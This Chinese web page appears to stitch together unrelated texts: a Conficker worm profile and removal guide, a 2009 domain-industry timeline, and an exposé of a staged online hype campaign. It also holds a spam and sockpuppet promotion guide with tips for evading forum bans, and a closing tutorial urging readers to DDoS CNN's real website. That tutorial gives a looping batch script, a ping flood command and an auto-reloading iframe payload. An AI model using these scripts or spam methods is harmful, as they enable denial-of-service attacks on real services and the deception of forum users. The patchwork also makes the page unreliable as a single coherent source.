Conficker简介：

       Worm:Win32/Conficker.B.9.831 ，利用0867漏洞的蠕虫。

       conficker蠕虫传播主要通过运行windows系统的服务器服务的缓冲区漏洞。它使用特定的RPC请求在目标电脑上执行代码。当在一台电脑中成功执行，它会禁用一些系统服务，比如windows系统更新，windows安全中心，windowsdefender和windows错误报告。然后他会连接一个服务器，在那里他会接到进一步传播的命令，收集个人信息，和下载安装附加的恶意程序到受害人的计算机中。它还会把自己添加到必然会有的windows活动进程中，像是svchost.exe，explorer.exe和services.exe。

       被conficker蠕虫感染症状：

       帐户锁定政策被自动复位。某些微软Windows服务会自动禁用，如自动更新，后台智能传输服务（BITS ）， WindowsDefender和错误报告服务。域控制器对客户机请求回应变得缓慢。系统网络变得异常缓慢。这可以从检测的网络流量图和windows任务管理器中看出。跟杀毒软件，windows系统更新有关的网站无法访问。另外它发射暴力密码破解攻击管理员密码以帮助它穿越并扩散到管理员共享。最好是把密码更换成更好的。

友情提示:

为了 能更完整 杀掉 win32.conficker病毒,

在打开 本文中的连接 时,请 先点右键,

再在 弹出的菜单 中选”在新窗口中打开”。

       清除Conficker蠕虫1(此方法适用于普通网民)

       1:下载最新Conficker免疫补丁

       http://www.microsoft.com/downloads/details.aspx?displaylang=zh-cn&FamilyID=0d5f9b6e-9265-44b9-a376-2067b73d6a03
       支持的操作系统： Windows XP Service Pack 2; Windows XP Service Pack 3
       http://www.microsoft.com/downloads/details.aspx?displaylang=zh-cn&FamilyID=f26d395d-2459-4e40-8c92-3de1c52c390d
       Windows Server 2003 Service Pack 1; Windows Server 2003 Service Pack 2

       2:打好补丁后,使用MSRT进行清除企业环境中MSRT的部署

       Conficker蠕虫清除工具下载–conficker蠕虫专杀工具

       http://support.microsoft.com/kb/890830 （Windows 2000/XP/2003/）

       其他恶意软件删除工具下载http://support.microsoft.com/kb/891716

       繁体中文（香港、澳门和台湾）用户，请参考微软官方网站提供的Conficker蠕蟲惡意軟體移除工具。

       3:如果还是杀win32.conficker木马病毒的话,可到http://www.fm5566.com/bingdu.htm下载conficker木马专杀工具.

       清除Conficker蠕虫2:(此方法适用于电脑管理人员,由赛门铁克诺顿提供)

       3.1移除使用W32.Downadup(Conficker蠕虫)移除工具
       赛门铁克安全响应中心已经开发出一种清除工具来清理感染的W32.Downadup(Conficker蠕虫) 。 使用此删除工具首先，因为它是最简单的方法以消除这一威胁。

      3.2 手动移除Conficker蠕虫
      以下说明涉及所有当前和最近的赛门铁克防病毒产品，包括利用Symantec AntiVirus和Norton AntiVirus的产品线。

 

1. 禁用系统还原（ Windows Me中/ XP中）
2. 更新的病毒定义
3. 执行完整的系统扫描
4. 删除任何值添加到注册表中

       对于具体的清除Conficker蠕虫细节上的每一个步骤，请阅读以下说明。

       1. 1 要禁用系统还原（ Windows Me中/ XP中）
       如果您运行的是Windows Me或Windows XP中，我们建议您暂时关闭系统还原。 Windows Me中/ XP使用此功能，这是默认启用，恢复计算机上的文件的情况下已被损坏。 如果病毒，蠕虫或木马程序感染的计算机，系统还原可能会备份病毒，蠕虫或木马程序的计算机上。

       阻止外部的Windows程序，包括防病毒程序，修改系统还原。 所以，防病毒程序或工具无法删除威胁的系统还原文件夹。因此，系统还原有可能受感染的文件恢复您的计算机上，即使您已经清除受感染的文件从所有其他地点。

      此外，病毒扫描可能的威胁，在系统还原文件夹，即使您已删除了威胁。

     有关如何关闭系统还原，请参阅您的Windows文件，或其中之一的以下条款：

• 如何禁用或启用Windows Me的系统还原
• 如何关闭或打开Windows XP的系统还原

       注意：当您完全完成移除程序和感到满意的是，威胁已经被清除，重新启用系统还原按照以下说明，在上述文件。

       如需详细资讯，并替代禁用Windows Me的系统还原，请参阅Microsoft知识库文章： 反病毒软件无法清除受感染的文件在_Restore文件夹 （文章编号： Q263455 ） 。

       2. 2 要更新病毒定义
       赛门铁克安全响应中心的全面测试所有的病毒定义，以保证质量，才张贴到我们的服务器上。 有两种方法，以获取最新的病毒定义：

• 运行的LiveUpdate ，这是最简单的方法获取的病毒定义。

  如果您使用的Norton AntiVirus 2006年，赛门铁克防病毒企业版10.0 ，或新产品，的LiveUpdate定义是每日更新。 这些产品包括新技术。

  如果您使用的Norton AntiVirus 2005年，赛门铁克防病毒企业版9.0或更早产品的LiveUpdate定义是每周更新一次。 唯一的例外是重大疫情时，定义的更新更加频繁。

• .下载的定义，使用智能更新：智能更新病毒定义的报。你应该下载的定义，从赛门铁克安全响应中心网站，并手动安装它们。

      最新的智能更新病毒定义，可浏览： 智能更新病毒定义 。有关详细说明，请阅读文档： 如何更新病毒定义文件使用智能更新 。

       3. 3 运行一个完整的系统扫描

       启动您的赛门铁克防病毒程序，并确保它被配置为扫描所有文件。

       对于Norton AntiVirus的消费电子产品：读取文件： 如何配置的Norton AntiVirus扫描所有文件 。

       赛门铁克杀毒软件企业的产品：读取文件： 如何验证赛门铁克公司防病毒产品被设置为扫描所有文件 。

1. 执行完整的系统扫描。
2. 如果发现有任何文件，按照指示显示您的防病毒程序。

       重要提示：如果您无法启动赛门铁克防病毒产品或产品报告说，它不能删除检测文件，您可能需要停止运行的风险，以将其删除。 要做到这一点，运行在安全模式下扫描。 如需指示，阅读文件， 如何启动电脑在安全模式 。 当你重新启动在安全模式下运行扫描一次。

        在文件被删除，重新启动计算机以正常模式和进行下一节。

       警告消息:可能会显示计算机重新启动后，由于威胁可能无法完全删除了这一点。 您可以忽略这些信息，然后单击确定。 这些邮件也不会出现在计算机重新启动后删除说明已全部完成。 邮件可能会显示类似如下：

       标题： [文件路径]
       邮件正文： Windows无法找到[文件名] 。 请确保您键入的名称是否正确，然后再试一次。要搜索一个文件，单击开始按钮，然后单击搜索。

       4. 4 。 删除该值从注册表
        重要提示：赛门铁克强烈建议您备份注册表之前，任何变化。不正确修改注册表可能会导致永久性的数据丢失或损坏的文件。 修改指定的子项只。 有关说明请参阅文件： 如何备份Windows注册表 。

1. .单击开始> “运行 。
2. 键入 regedit
3. 单击确定。

   注意：如果注册表编辑器无法打开的威胁可能已经修改了注册表，阻止访问注册表编辑器。 安全响应中心已经开发了一种工具来解决这一问题。 下载并运行此工具 ，然后继续拆除。

4. 导入到并删除以下注册表项：
5. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\netsvcs\Parameters\”ServiceDll” = “[蠕虫路径]”
6. 退出注册表编辑器。

   注意：如果创建或修改了危险的注册表子项或项HKEY_CURRENT_USER下，很可能造成他们的每个用户的计算机。 为了确保所有的注册表子项或条目被删除或恢复，请使用每个用户帐户和检查任何HKEY_CURRENT_USER上面列出的项目。

Conficker蠕虫分析

autorun.inf执行安装后
进程路径:C:\WINDOWS\EXPLORER.EXE
文件路径:C:\WINDOWS\System32\RUNDLL32.EXE
命令行:setupapi,InstallHinfSection DefaultInstall 132 C:\autorun.inf

添加启动项:
“随机名称”
值: “rundll32.exe 系统文件夹\*dll,参数>”
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
此DLL自己还可能多个启动项:
1.svchost启动netsvcs 组时
2.HKLM\SYSTEM\CurrentControlSet\Services下
这个DLL加了权限,要解除权限再删除
以下目录也可能有病毒文件,启动参数一致
%ProgramFiles%\Internet Explorer
%ProgramFiles%\Movie Maker
toolbar
HKCU\Software\Microsoft\Internet Explorer\Toolbar\Shell Browser\*
HKCU\Software\Microsoft\Internet Explorer\Toolbar\Explorer\*
替换HKLM\SYSTEM\CurrentControlSet\Services的存取权限，同时修改Access Control List,只能允许本地帐号存取
以下服务被禁用或启动失败:
Windows Update Service
Background Intelligent Transfer Service
Windows Defender
Windows Error Reporting Services
修改注册表项
HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
“TcpNumConnections” = “0×00FFFFFE”
感染移动存储设备
包括了 ?:\RECYCLER\S-%d-%d-%d-%d%d%d-%d%d%d-%d%d%d-%d\随机名.dll

(形如RECYCLER\S-5-3-42-2819952270-8240756944-879315005-2883)
重置系统还原点，可能具有的执行名称(两两组合,或者和随机字符串组合):
Boot
Center
Config
Driver
Helper
Image
Installer
Manager
Microsoft
Monitor
Network
Security
Server
Shell
Support
System
Task
Time
Universal
Update
Windows

包含下列文字的网站或者更新服务都会失效,删除启动项:
virus
spyware
malware
rootkit
defender
microsoft
symantec
norton
mcafee
trendmicro
sophos
panda
etrust
networkassociates
computerassociates
f-secure
kaspersky
jotti
f-prot
nod32
eset
grisoft
drweb
centralcommand
ahnlab
esafe
avast
avira
quickheal
comodo
clamav
ewido
fortinet
gdata
hacksoft
hauri
ikarus
k7computing
norman
pctools
prevx
rising
securecomputing
sunbelt
emsisoft
arcabit
cpsecure
spamhaus
castlecops
threatexpert
wilderssecurity
windowsupdate

检测弱口令,远程创建计划任务: rundll32.exe *.dll 参数

自此，Conficker蠕虫清除基本查杀完毕

2009年中文互联网域名圈里值得关注的“大事件”：

一月

1块钱注册.CN域名活动宣告结束，CNNIC称，CN国家域名的注册价格开始由市场自行调节。

2009年1月13日，中国互联网络信息中心(CNNIC)在京发布了《第23次中国互联网络发展状况统计报告》，报告显示，截至2008年底，中国的域名总量达到16,826,198个。现已展开《第25次中国互联网络发展状况调查》。

二月

CNNIC曝光52家涉嫌欺诈的违规注册商。

新浪推出四块钱.CN域名注册服务，其中包含了Gov.cn域名，随后官方更改后缀，此次乌龙事件宣告结束。

AdSense for domains 中文版正式发布，后因域名提供商不兼容而暂停。

互联网基础设施提供商威瑞信发布《2009年2月第一期域名行业简讯》，截至2008年底，.CN域名注册量跃居全球第二。

国内知名游戏站点电玩巴士、多玩网域名被注册商暂停解析。

三月

CNNIC下发通知，CN域名的域名注册过渡期将于2009年2月28日结束，3月1日后，英文CN域名的价格将恢复到正常价格水平。

中国移动获得CNNIC注册资格认证。

酷讯网20万收购Kuxun.com。

 DNS的木马新变种现身互联网。

VANCL、BONO等多家服装网站域名被劫持，共同指向玛萨.玛索。

三鹿官方网站域名sanlu.com.cn遭网友抢注。

国际域名注册商巨头威瑞信宣布进军中国。

四月

淘宝网下发公告，称严禁提供域名备案等低俗商品信息。

CNNIC宣布其自主研发的服务器域名证书——网址卫士已获得国际安全标准认证。

历时半年，红旗软件被判败诉，RedOffice.cn站长可继续持有。

CNNIC称将继续清理CN域名下的不良应用。

谷歌公司从域名投资者手中购得“laiba.com、laiba.cn、laiba.com.cn”整套域名，具体成交价格不详。

新网互联称5月4日整顿未备案域名，跳转域名亦在其列。

“.中国”域名在国内陆续启用，广东地区率先内测。

亿唐网etang.com由于没有续费的原因，被其注册商Networksolutions的合作伙伴Namejet公开拍卖抢注。

五月

中国联通收购wo.com.cn域名，预计10万元人民币。

易名中国推出姓名.CN域名注册服务，两元钱注册英文姓名.CN。

康盛创想 & 落伍者八周年大会IDC分会场举行域名现场拍卖活动，其中fujian.com、wangzhan.com引人关注。

DNSPod遭攻击，六省网络大瘫痪。

开心网因Kaixin.com起诉千橡，称其混淆品牌。

六月

微软全球发布Bing（必应），收购biying.com、biying.cn等域名。

中国首届域名交易大会于6月5日在北京嘉里中心召开。

DNSPod断网门事件攻击者被抓获

CNNIC于6月5日发布了我国首个《域名交易自律公约》，该公约由域名交易机构和域名投资人共同签署。

酷六网成为CNNIC认证的域名注册商，官方称此举为扩充PHPCMS业务。

新网互联旗下两台主要的DNS服务器瘫痪，导致236124个域名访问中断。

台湾“中央研究院”计算中心日前宣布顺利完成一组全球根服务器的建置，成为全球13组根网络域名系统服务器（Root Domain Name System Server，简称根服务器）的服务机构之一。

浙江移动以4万元人民币的价格买下10086.cn

七月

江西小伙为持有alibababank.com.cn，状告阿里巴巴公司。

ICANN加快“.中国”域名的国际部署进程。

DNSPod宣布封杀****域名用户，Gov域名后缀多达33个，CNNIC随后发表声明，称这些政府域名被挂马所致。

 框计算概念，http://boxcomputing.baidu.com/。

新网XINNET在全球增长速度最快域名注册商中排名第五，拥有域名1,326,719个。

校内网更名人人网，恢复Renren.com的使用。

九月

李开复离职创办创新工厂，注册相关域名

阿里云宣告成立，并启用alibabalabs.com域名。

腾讯推出独立域名邮箱，域名持有人可拥有个性域名邮箱后缀。

雨林木风10万美金竞得XP.COM。

域名提供商忘记续费，84840.com遭抢注。

Google封锁企业套件漏洞，.CN域名将不可再申请Google企业套件。

淘宝网推出二级域名注册服务。

新浪内测SNS众乐网，并收购Zhongle.com。

百度收购Tieba.com，价格估计不低于6位数。

阿里巴巴宣布战略投资中国万网。

十月

UUCall域名遭停止解析，软件宣告停止服务。

微软公司购得Windows7.cn，成交价30万人民币。

百度成功回购Youa.cn/Net.cn等域名。

 遭攻击，域名无法正常解析。新网DNS曾多次遭攻击。

免费论坛服务商5D6D宣布域名增值服务，绑定独立域名全年缴纳120-140元，后宣布取消该计划。

十二月

CCTV曝光名富、大煌网涉黄。

fm5566服务器遭DDoS攻击

CNNIC宣布开启域名整治行动，取消名富、大煌网.CN域名新注册资格。

易名中国宣布推出身份证实名、手机双认证服务。

Godaddy宣布将支持支付宝付款。

CNNIC宣布个人注册.CN域名将受限。

新网关闭近3000个虚假注册信息的域名解析。

国内投资人竞购17.com。

工信部加大手机色情整治，向域名商提五项要求。

工信部将建立被关闭网站域名持有者黑名单。

Godaddy宣布圣诞促销活动，0.99美金可注册.com域名。

庞升东50万收购caihong.com。

新网互联、商务中国等注册商要求个人代理备案，需提供ISP、ICP证件信息。

中国万网宣布停止域名Url转发服务。

新网再次出现域名解析故障。

深圳宣布将实行个人网店域名备案制度。

　“香水女孩”(王亭亭)与“90后贱女孩” (包包和阿紫)是现实中的朋友，包包和阿紫都是普天同庆文化传媒(北京)有限公司旗下艺人.由于长期跟“贱女孩”这类人一起玩，受她们的影响，加上高中与大学成绩的巨大落差，让王亭亭产生了严重的心理失落感，对学习也有严重的厌烦情绪，经过长时间的休学，王亭亭更加觉得学校的那种生活不适合自己。王亭亭喜欢写情感方面的文章，成为美女作家是她的梦想，曾经在校内网长期写男女情感方面的文章，还被评为人气之星。(在有人质疑前后博客文章风格不一致后，在公司要求下,她把校内网空间删除)于是在包包和阿紫的引荐下，她与普天同庆文化传媒有限公司进行了接触.

　　在对王亭亭的情况进行了解后，普天同庆文化传媒公司认为她有名牌高校的背景，形象也不差，有很高的炒作价值，一旦将她炒热将为普天同庆带来不小的收益。在这种情况下，普天同庆文化传媒公司许诺王亭亭，将与她签约十年,给她出书十本,共100万字,但要求在出书之前,先炒作一下,把她炒成明星,然后公司再举办一个公开的签约仪式,以2000万元的高价与她签约,这样书的销售就不用发愁了。她什么都不用管,只需要按照公司吩咐的做就行.这番说辞打动了王亭亭,她同意了。

　　由于网络炒作成本低,见效快,而且一直是普天同庆文化传媒公司的强项，包括“90后贱女孩”，以恶搞视频和公开信红透网络的女歌手沐尔都是出自该公司之手，因此普天同庆文化传媒有限公司立刻将这个想法，与曾在“90后贱女孩”炒作中配合默契的的腾讯网进行了沟通。可能很多网友都不知道，腾讯网实际上与普天同庆文化传媒公司有着非常紧密的合作关系，在2008年6月25日，由普天同庆文化传媒有限公司主办的“纪念黑豹二十周年暨全国巡演北京启动仪式”，就是由腾讯摇滚频道提供独家网络支持。在普天同庆文化传媒有限公司的公司网站上，腾讯网被列为战略级的合作伙伴，可见双方合作紧密之程度。而腾讯网一向热衷于各种网络炒作，大家可以从其娱乐频道的各种八卦、小道消息就能看出他对这种网络炒作的热衷程度，因为这种炒作既能有效的提升网站流量，又可以增加腾讯网的社会暴光度，所以腾讯网非常热心，并与普天同庆一起策划“香水女孩”的炒作方案。

　　以什么样的话题来进行切入，既能取得最好的炒作效果，又显得真实、自然?经腾讯网和普天文化深入研究后，决定以抨击外语教育制度、抨击教育部的话题进行炒作，一方面从社会大环境看，正好是两会期间，公众和媒体对各种社会民生问题都保持着很高的关注度，以王亭亭北外女大学生的身份来抨击外语教学制度和教育部，容易引起社会各界的关注;另一方面腾讯网大部分受众都是学生，对外语教育制度的抨击可以引起他们的共鸣，带动他们强烈的不满情绪，而且这些人本身也是很多其他网站、论坛的用户，利用他们的传播，将进一步扩大整个炒作的影响范围和影响力;而对腾讯网来说，把这个事情当作一个娱乐事件来操作肯定是不合适，但是如果是从关注教育的角度来切入，通过支持一个弱势女大学生对现行外语教学制度进行抨击，既能迎合社会上同情弱者的普遍心理，给他们一个腾讯网是为民请命的负责任媒体形象，使腾讯网能够站在一个道德的制高点上，对王亭亭的支持理所当然化，淡化炒作的痕迹。更重要的是还有效的跟腾讯网两会专题相结合，特别是在两会快结束，其他门户基本没有什么热点的时候，将这个做成腾讯网的一个独家的特色内容，能够很好的宣传一下腾讯网博客，因为腾讯网博客内容基本都是各种煽动性话题，只要把用户吸引来了，肯定会留住很多用户。

　　实施阶段:

　　王亭亭于3月4日在腾讯网开博,博客的QQ号码前五位是62200，腾讯公司专门派发给名博的号码都是以这五位数开头。但开博之后没有立刻写博文，这是因为还需要等待最佳的时机，因为这个时间正好是两会陆续开幕，社会各界关注的重点都是经济、就业等国民经济领域的话题，而且各种名人专家学者和委员代表的观点层出不穷，与他们相比，王亭亭抨击教育部的话题很难吸引大家关注。而且其他门户都在集中报道两会的时候，腾讯网来炒作这个显得有点不合时宜。后来在腾讯网的建议下，炒作实施的时间选在了3月11日，因为这个时候是两会的尾期，各种新闻热点基本上都报道完了，但社会各界对两会还保持着一定的关注度，在这个时候腾讯网独家推出这个抨击教育部和教育制度的炒作恰逢其时，肯定能迅速引起各界关注。

　　在精心确定了话题和时间后，按计划，在3月11日，王亭亭发表了第一篇博文《我推荐赵本山当教育部长》，腾讯网迅速将该文在博客频道置顶，并同时在腾讯网首页和新闻中心首页进行推荐，引起网友关注。与此同时，王亭亭在公司的指示下，去学校提出退学申请，与她同去的还有普天同庆的2个摄影师，并在学校拍照留念。北外老师刘玉华劝说无效，表示尊重她个人选择，并要她回去写申请。而在3月12日，王亭亭发表第二篇博文《外语剥夺了中国人的受教育权》，这篇文章实际上是抄袭的广西民族学院民族学与社会学学院龙耀在2006年发表的《我国现行外语教育制度的法律思考》。腾讯网又将该文迅速在博客频道首页，并在网站和新闻中心首页推荐。同时在腾讯网的运作下，广州日报报业集团下属《信息时报》以《北外女生炮轰外语强制教育》的题目进行了报道，该报道被很多报纸和媒体转载，事件的影响开始扩大。

　　北外的老师和领导开始注意到了这个事情，因为王亭亭是以北外学生的身份炮轰教育部和外语教学，为避免给学校带来不利影响，在3月13日上午和下午，刘玉华两次找王亭亭谈话，其中谈到了王亭亭博客的问题，给她施加了一定的压力，同时要求如果王亭亭退学必须家长亲自来学校，经过家长同意之后学校才能给她办理退学手续。但王亭亭要求下午立刻办理退学手续，说退学已经经过妈妈同意，并在下午写了退学申请，同时阻止家里人与学校进行接触。后来刘玉华联系上了王亭亭的奶奶，她奶奶说不退学，要继续上。

　　在3月16日凌晨00：36，王亭亭在博客发表文章《妈妈，我被北外强制退学了》，文章写得感情真挚，催人泪下，并在后面贴了自己12日拍的照片。腾讯网在文章发布之后就立刻将文章置顶，同时在首页和新闻中心首页推荐。而实际上，由于博客不象新闻，对时效性的要求那么高，正常这个点，是没有编辑值班的。一个美女大学生因为博文被北外退学的哭诉，加上腾讯编辑给文章起的倾向性的标题，再加上普天同庆公司的工作人员冒充网友在留言中煽风点火，腾讯网对凡是质疑和反对的网友评论都立刻删除，整个网友评论显示出一面倒的支持王亭亭的声音，不明真相的网友们愤怒了，有要提供法律援助的，有炮轰教育部和北外校风的，也有人开始人肉搜索相关教师的。在3月17日，王亭亭的博客又发了一篇文章《怀念蔡元培，做陶行知的好学生》，将网友的这种愤怒情绪推到了最高潮，也使媒体和网民对这个事情的关注达到最高点，而实际上这篇文章根本不是出自王亭亭之手，而是腾讯网和普天同庆商量后，由腾讯网的员工写的，前面王亭亭的那些文章也大多是由她写，由腾讯网修改润色。

　　但随着事态的发展，问题的严重性已经超出腾讯网和普天同庆当初的估计，一方面王亭亭的父母已经到了北京，他们不同意王亭亭退学，甚至采取了下跪，断绝父女关系的的方式威胁她。而北外也表态她可以重返校园，同时越来越多的网友开始质疑王亭亭炒作，并辱骂她，在这种情况下，王亭亭后悔了，她不愿意继续配合公司的炒作。而另一方面，随着事情的越闹越大，媒体记者的报道越来越多，信息源越来越多，腾讯网原来控制下的一面之辞和各种反常举动，引发了社会各界对腾讯网媒体道德的质疑，包括《中国青年报》等多家官方媒体开始介入，并以不点名的方式指责腾讯网炒作，腾讯网受到的政治压力开始增大，再炒下去只会让真相越来越明，对腾讯网的公信力造成毁灭性的伤害，而且这段时间的炒作也让腾讯网的流量和暴光度大幅度增加，该得到的都已经得到了，在这种情况下，腾讯网也希望将事情冷却下来。对于普天同庆公司而言，他们在炒作中一直是以隐身的角色存在，没有受到直接的压力，而且还顺便宣传了一下旗下的艺人，他们的目的也达到了。

　　3月18日，王亭亭通过腾讯博客宣布封口，并将返校读书，她将以复学的身份继续北外的求学生活。为避免王亭亭的博客成为其他媒体揭露腾讯网的把柄，腾讯网以黑客攻击的理由将王亭亭博客删除，并无法搜索，但还在进行所谓的后续跟踪报道，并在首页推荐。

　　总结：现在网络上都是对”北外女孩“的一片批判之声，可实际上她只是一个被不良公司和网络媒体利用的牺牲品，真正该受到批判的是不负责任的普天同庆文化传媒有限公司和腾讯网，特别是腾讯网，做为此次炒作中的最大受益者，如果能坚守媒体的社会责任和道德，坚持自身的媒体操守，不利欲熏心而与这些娱乐公司同流合污，甚至利用自己媒体的身份制造虚假报道，推波助澜，煽动网友情绪，又怎么会有这种事情出现呢?腾讯网曾经在315大爆其他行业潜规则，而自己却亲自参与甚至制造娱乐行业潜规则，作为媒体，其公信力何存?直到今天，我们尚看不到腾讯网丝毫的反省，看到的只是他对”香水女孩“事件的跟踪报道。。。。。

开启网络make money onlien的钥匙

一:网上网钱新手初级篇
  · 去人气旺的论坛/社区去发铃声下载的广告贴。

  · 百度贴吧，雅虎部落等发广告帖。

  · 热门博客去留言，抢沙发，一是要眼球，二是要搜索权重

  · QQ等即时通讯软件推广，发给自己QQ里面的好友或者群发去推荐的等等

  · 自然排名：做好网站后，去提交百度googel雅虎等搜索引擎，做好搜索引擎自然排名要注意的几个要点：

    a) 注重一下外链质量和数量

    b) 网站内部结构合理化，内链同样重要，可能的情况下，多用二级域名，二级域名和主站间的链接很有效，搜索引擎把二级域名当作独立站点对待

    c) 自己的网站的页面结构优化，title，h1,strong等标签一定要用

    d) 页面静态化，页面和二级域名越多越占优势

    e) 频繁更新页面

  · 网站群推广：大部分站长都是站群化发展，有了音乐站，再来个mp3站，再来个网址站，或者图片站小说站等等，利用站群互相带流量，来推广图铃等联盟产品赚钱。

  · 加入文字链进行推广，这样的文字链网站比较多的，图铃、电影类的网站做这个的真是多之又多的，把自己的流量去置换，产生更多的流量。

  · 百度知道 爱问等处推广，即自问自答，要记得穿马甲哦。

   社区化推广的，基本上都会备着多个马甲id，随时把自己广告顶上去，弄个所谓的不沉贴。管理员封了id，就再注册再发，管理员屏蔽铃声等字符串，就加上空格，或者发带方框的字体。

二:网上网钱新手进阶篇

  1、如何更快的社区推广？

  2、百度，google，雅虎，有些关键字我特别需要排名，怎么样才能没封站风险的，快速排到第一页？

  3、百度贴吧/百度知道等处发广告，网址被封怎么办？

  4、如何让简单实现帖子的不沉啊？有专门的软件么？

  5、有没有可能访问一个论坛的帖子或者文章，直接自动转到我的网站啊？什么？封掉javascipt的页面，也能自动跳转么？

  6、QQ和msn能群发么，被封有办法突破么？
  （一）群发类推广

  1) QQ群发：这个可以分成三种软件

    a) 一种是群发自己的QQ好友的，熟人钱也赚，真。。。无言；

    b) 一种是群发所有在线QQ的，软件自动探测在线会员名单，进行自动加入好友和群发；

    c) 第三种是定向群发，用软件通过搜索引擎采集QQ号，或者用软件采集论坛会员的QQ号，进行定向群发，只发指定的QQ号。

    d) 在QQ群发里面，还有种群发方法是不需要加为好友的。

    e) QQ群的群发也有，谁让腾讯做了中国最大的客户端呢（微软操作系统除外）

    f) QQ病毒群发的那种，文章后面说说。

  2) QQ标题推广：某某流氓改了用户的个人设置，标题换成了推广文字

  3) QQ自动留言：这个都明白，自己能设，现在还有用机器人的，大千世界啊。

  4) QQ邮件群发：QQ邮件的缺点在于知道QQ号，就知道QQ邮箱。

  5) MSN群发：和QQ群发一样。

  6) MSN邮件群发：MSN用邮箱做ID登录，so…

  7) 普通Email群发。
  留言本群发：能搞数量不大的直接流量，但是对搜索引擎排名方面影响很大，去下面的搜索引擎栏目看下，现在被搜索引擎盯上了已经。

  9) 供求信息网站群发：就是那句话，有交互的地方，就有人插播广告文字和链接

  10) WIKI群发：去下面的搜索引擎栏目看下

  11) 论坛社区帖子群发：

    a) meta的refresh到别页的功能被禁止了，还能跳？

    b) Object页面元素也被禁止了，还能跳？

    c) javascript也被禁止掉了，最后一招被搞了，还能跳么？

    d) Flash进行跳转！Flash也被禁止了，彻底没戏了，还能跳转么？

    e) 我还能跳转，想知道么

    f) 怎么脑子里面还是跳转。

  12) 论坛站内短消息群发。

  13) 百度贴吧群发,用顶贴器啊。

  14) 百度知道批量发：实际上，谈不上啥批量发，搞百度知道及其类似的网站，批量注册大批会员作为马甲和托，就达到目的了。马甲和托，你总明白是啥意思吧。

  15) 批量顶贴：很多论坛包括贴吧都有专门的顶贴器。

  16) 博客群发。

  17) 博客留言群发：这个主要给搜索引擎看，见下面。

  18) 手机短信群发：做图铃，手机群发自然是最直接的。

  19) 点歌群发：很多图铃联盟在点歌节目里面故意不加验证码。

  没有做不到，只有想不到，e话通，淘宝旺旺，都能群发，我列的都累了的，自己去拓展一下吧。

（二）病毒、流氓类客户端推广

  主要客户端：

  1) IE等浏览器插件

  2) Windows桌面软件，这些往往被当作插件的载体了，如珊瑚虫之类，一旦被收购或者投资，就逐步从良了。但是也有些桌面软件是直接做广告投放的，电影的，图铃的，点击类的，都有，如bitcomet之类的。

  3) 流氓程序（EXE，DLL等），这年头的流氓客户端，基本都采用驱动级的，安全模式都删除不掉，自动改名绕过杀毒软件，内存复活技术等等。

 客户端推广主要表现形式：

  1) 地址栏劫持：通用网址，3721，QQ新版也带地址栏插件，sogou的toolbar，百度的搜霸，都劫持或者监控地址栏。

  2) 浏览器右键菜单，收藏夹，工具栏，

  3) 浏览器首页，咋被强制成了图铃广告页面？

  4) 访问某网页出现404等错误时候，突然发现转到了isp（网通或者电信）的某个提醒页面。

  5) 网通电信拨号软件作恶，弹出广告。

  6) QQ劫持：QQ病毒。

  7) 其他软件劫持。

  网页篡改：你访问的网站是www.fm5566.com，怎么打开之后被跳转到www.xxxxx.com去了？why？你的网站里面挂的百度联盟，被改成了google联盟，why？

  9) 怎么我访问任何网页，鼠标放到图片上面，就有个发送图片到手机呢？

  10) 现在开始流行富媒体广告了，表现方式也是多样化，右下角滑窗，网页内嵌，链接Popup。

  11) 还有更流氓的方式么？有！自己去发现吧。

（三）另类和黑客推广

  1) 另类推广之一，老站长搞了很多热门rmvb电影，他用软件批量加入了弹窗。

  2) 黑客也在玩推广，利用系统漏洞直接给你的电脑里面装上一堆东东。

  3) 服务器被人挂马，自己的网站一被人访问，就转到xxx去了。

  4) 服务器再度被黑，自己网站赖以为生的广告代码被改掉了。。。

  5) 造势之事件营销。

  6) 祝福类推广：弄上有趣的页面，支持自定义姓名的那种，发发新年祝福什么的。

  7) 仿造页面：类似6位QQ号那种欺诈推广，转给10个朋友送Q币或者QQ号之类的。

（四）搜索引擎推广

    搜索引擎提高排名通过。

  1) 留言本群发：

  2) 供求信息群发：发发链接的一个途径，别指望能骗直接流量。

  3) 论坛群发：外链增加，也可同时加入页面自动转向。

  4) Wiki群发。

  5) BLOG博客群发。

  6) BLOG博客留言群发。

  7) Linkfarm 链接工厂。

  泛域名=二级域名。

三：网上网钱高手进阶篇

还是以图铃为例，讲讲钱生钱的一些招数。

1、地址栏流量购买：

  1）通用网址：

   2）3721网络实名：

   3）插件类

  3、文字链、窄告类投放：

  4、固定广告位购买：

  5、搜索引擎推广：

 网赚到此大功告成矣，你就等着收钱吧！

个人觉得，很低级，但是，当这样的手法X13亿的时候，就能显示出他的威力了。也许这就是人多的好处吧。
　　近期，CNN主播卡弗蒂对于中国人民带有强烈歧视性的言论，以及CNN对于这一事件缺乏诚意的道歉和对于中国政府的无端指责，激起了全国人民的强烈愤慨。于是在一些爱国技术人员的倡议下，广大网民发起了一场针对CNN官方网站的攻击行动。下面，笔者从技术的角度对这次攻击中采用的攻击方法进行解析。
　　一、攻击技术
　　这次攻击采用的是DDOS攻击方法，即英语“Distributed Denial of Service”的缩写。顾名思义，即是利用网络中的无数计算机，向某一特定的目标计算机发动密集式的“拒绝服务”要求，从而把目标计算机的网络资源及系统资源耗尽。这是一种最有效而且难以有效防范的攻击技术。
　　1.手动攻击
　　在浏览器的地址栏中输入CNN的网站地址http://www.cnn.com，频繁登录访问其网站。其实这算不上攻击，但是当有数以万计的人同时登录时同样会耗费其网络带宽、系统资源，造成网络拥堵。
　　2.批处理脚本
　　把以下代码保存为一个.bat文件，比如cnn.bat，然后直接双击运行即可。

@echo off 　　:test 　　taskkill /f /im iexplore.exe 　　start http://www.cnn.com 　　sleep 2 　　goto test

　　解释：每隔1秒钟关闭IE进程，循环访问http://www.cnn.com。比上面的手动攻击更方便，但是IE窗口关闭又开启影响正常工作，适用于电脑闲置时。(图1)
　　
　　3.ping攻击
　　在命令行(cmd.exe)中输入如下命令：
　　ping www.cnn.com -t -l 65500
　　解释：持续不断向www.cnn.com发送65500字节的数据包，当然只有一台机器发送没有效果，当数以万计的机子发送的时候才见威力。(图2)
　　
　　4.脚本攻击
　　网友在QQ群、论坛、百度贴吧等其它地方发布如下网页代码，把它保存为cnn.htm文件，然后双击打开即可。

<iframe id=”cnn” width=”100%” height=”100″ ></iframe> <script> var e=document.getElementById(’cnn’); setInterval(”e.src=’http://www.cnn.com’”,3000); </script>

